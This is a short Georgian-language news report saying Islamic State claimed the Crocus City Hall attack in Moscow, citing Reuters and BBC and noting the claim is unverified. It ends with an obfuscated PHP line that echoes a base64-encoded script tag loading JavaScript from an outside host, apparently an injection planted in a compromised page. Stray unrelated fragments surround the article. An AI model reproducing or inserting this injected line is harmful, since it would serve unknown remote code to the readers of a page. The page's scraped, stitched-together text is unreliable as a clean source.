celsiusi
ავერსი საქკაბელი

საინფორმაციო სააგენტო „როიტერსი“ იუწყება, რომ მოსკოვის "კროკუს სითი ჰოლზე" თავდასხმაზე პასუხისმგებლობა "ისლამურმა სახელმწიფომ" აიღო. სააგენტო აღნიშნავს, რომ ინფორმაცია "ისლამურმა სახელმწიფომ“ საკუთარ "ტელეგრამის არხზე" გაავრცელა.

ამასთან, როგორც BBC- ი წერს, ინფორმაცია დამოუკიდებლად არ არის გადამოწმებული. BBC-ის კორესპონდენტი გორდონ კორერა აღნიშნავს, რომ ჯგუფმა წარსულში აიღო პასუხისმგებლობა ისეთ თავდასხმებზე, რომლებთანაც მას საერთო არაფერი ჰქონდა.

ცნობითვის, 7 მარტს რუსეთის უშიშროების ფედერალურმა სამსახურმა (FSB) განაცხადა, რომ აღკვეთა თავდასხმა მოსკოვში სინაგოგაზე, რომელსაც "ისლამური სახელმწიფოს" დანაყოფი გეგმავდა. რუსეთის "ეფესბე"-მ განაცხადა, რომ თავდამსხმელებმა გახსნეს ცეცხლი დაკავების მცდელობის დროს და ისინი "განეიტრალდნენ საპასუხო ცეცხლით".

შეგახსენებთ, მოსკოვში, "კროკუს სითი ჰოლში" სროლისა და ხანძრის შედეგად, ოფიციალური ცნობებით დაიღუპა 40 და დაშავდა 100-ზე მეტი ადამიანი.

207
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");